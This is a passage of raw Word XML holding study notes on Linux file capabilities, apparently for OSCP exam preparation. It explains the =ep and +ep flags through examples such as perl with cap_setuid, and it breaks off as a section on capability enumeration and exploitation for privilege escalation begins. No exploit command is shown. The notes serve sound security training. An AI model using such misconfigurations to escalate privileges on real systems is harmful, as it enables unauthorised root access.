          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), but it doesn't need full root access. With traditional SUID, you'd have to give it root, which is dangerous. With </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">capabilities</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can give it only </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cap_dac_read_search</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which lets it bypass file read permission checks—</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">without</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> letting it bind to network ports or kill other processes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000231E">
      <w:pPr>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000231F">
      <w:pPr>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Common capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002320">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Each capability is named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cap_&lt;function&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Some key examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002321">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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cap_dac_read_search</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – bypass file read permission checks (used in your example)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002322">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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cap_net_bind_service</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – allows binding to ports &lt; 1024</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002323">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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cap_sys_ptrace</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – trace other processes (used in debugging or process inspection)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002324">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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cap_setuid</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – allows setting user ID (like what </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> does)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002325">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_93298nw0xzy1" w:id="312"/>
      <w:bookmarkEnd w:id="312"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002326">
      <w:pPr>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The flags </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=ep</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002327">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you see something like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002328">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar = cap_dac_read_search=ep</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002329">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That means the tar binary has this capability:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000232A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    e</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Effective – the capability is active while the binary runs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000232B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Permitted – the capability is allowed to be used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000232C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000232D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=ep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vs. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+ep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=ep</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000232E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1147"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The capability set is being explicitly set to only effective (E) and permitted (P).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000232F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1147"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Any other possible flags (like inheritable, I) are cleared.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002330">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1147"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1147"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar = cap_dac_read_search=ep</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002332">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1147"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means tar has only cap_dac_read_search in its effective and permitted sets, nothing else.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002333">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+ep</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1277"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The capability is being added to the existing set, instead of replacing it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002335">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1277"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Other capabilities or flags it already had are preserved.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002336">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1277"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002337">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1277"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">perl = cap_setuid+ep</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002338">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1277"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means perl already may have had other capabilities, and now cap_setuid is added to its effective and permitted sets without removing anything else.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002339">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In short:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000233A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=ep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → "Set the capabilities to exactly E and P" (replace whatever was there).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000233B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+ep </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ "Add E and P to what’s already there" (append without removing).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000233C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000233D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—----------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000233E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000233F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sfywprxlcnyr" w:id="313"/>
      <w:bookmarkEnd w:id="313"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Capabilities enumeration and exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002340">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002341">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 18.4.1. Abusing Setuid Binaries and Capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002342">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002343">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Capabilities are extra attributes that can be applied to processes, binaries, and services to assign specific privileges normally reserved for administrative operations, such as traffic capturing or adding kernel modules. Similarly to setuid binaries, if misconfigured, these capabilities could allow an attacker to elevate their privileges to root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002344">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To demonstrate these risks, let's try to manually enumerate our target system for binaries with capabilities. We are going to run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getcap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
